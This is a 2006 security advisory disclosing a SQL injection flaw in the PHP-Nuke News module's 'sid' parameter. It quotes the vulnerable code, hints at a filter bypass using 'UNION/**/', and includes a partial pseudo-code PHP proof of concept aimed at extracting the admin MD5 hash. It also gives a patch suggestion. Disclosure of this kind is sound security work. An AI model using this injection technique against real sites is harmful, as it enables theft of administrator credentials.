/* -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST] - Advisory 30 - 2006-11-24 -------------------------------------------------------- Program: PHP-Nuke Homepage: http://www.phpnuke.org Vulnerable Versions: PHP-Nuke <= 7.9 Risk: Medium Impact: Medium Risk -==PHP-Nuke <= 7.9 News module "sid" SQL Injection vulnerabilities==- --------------------------------------------------------- - Description --------------------------------------------------------- PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases. - Tested --------------------------------------------------------- localhost & many sites - Vulnerability Description --------------------------------------------------------- In /modules/News/index.php the "sid" variable is not sanitized correctly. Here is the vulnerable code: ==[ /modules/News/index.php 140-142 ]============================= [...] OpenTable(); $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_stories WHERE sid='$sid'")); $row[title] = filter($row[title], "nohtml"); [...] ==[ end /modules/News/index.php ]================================= That code is in the rate_article() function. The same bug is present at the rate_complete() function in the same file: ==[ /modules/News/index.php 245-246 ]============================= [...] $row = $db->sql_fetchrow($db->sql_query("SELECT title FROM ".$prefix."_stories WHERE sid='$sid'")); $row[title] = filter($row[title], "nohtml"); ==[ end /modules/News/index.php ]================================= magic_quotes_gpc php directive must be turned Off so the simple quotes (') are not filtered. Also we have to know the prefix used for the database tables ("nuke_" by default). In this way, bypassing the SQL Injection Protection, like using someone like 'UNION/**/' and not ' UNION ' in our sql injections, we can get the admin md5 hash by sending a malicious GET request. ==Pseudo-Code Proof of Concept exploit== <? /* Neo Security Team - Pseudo-Code Proof of Concept Exploit http://www.neosecurityteam.net Paisterist */ set_time_limit(0); $host="localhost"; $path="/phpnuke/"; $port="80"; $fp = fsockopen($host, $port, $errno, $errstr, 30); if ($fp) { /* we put the GET request on $p variable, with "sid" containing. */ fwrite($fp, $p); while (!feof($fp)) { $content .= fread($fp, 4096); } preg_match("/([a-z0-9]{32})/", $content, $matches); if ($matches[0]) print "<b>Hash: </b>".$matches[0]; } ?> ==Pseudo-Code Proof of Concept exploit== Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table. - How to fix it? More information? -------------------------------------------------------- You can found a patch on http://www.neosecurityteam.net/foro/ Also, you can modify add in the /index.php file some like this: $sid = ($_GET['sid']) ? intval($_GET['sid']) : intval($_POST['sid']); That's a momentary solution to the problem. I recommend to download the PHP-Nuke 8.0 version in the next days... it is not free at the moment. - References -------------------------------------------------------- http://www.neosecurityteam.net/index.php?action=advisories&id=30 - Credits -------------------------------------------------------- News module SQL Injection discovered by Paisterist -> paisterist[dot]nst [at] gmail[dot]com [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/ - Greets -------------------------------------------------------- HaCkZaTaN K4P0 Daemon21 Link 0m3gA_x NitRic LINUX nitrous m0rpheus nikyt0x KingMetal Knightmare Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!! @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@ @@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ /* EOF */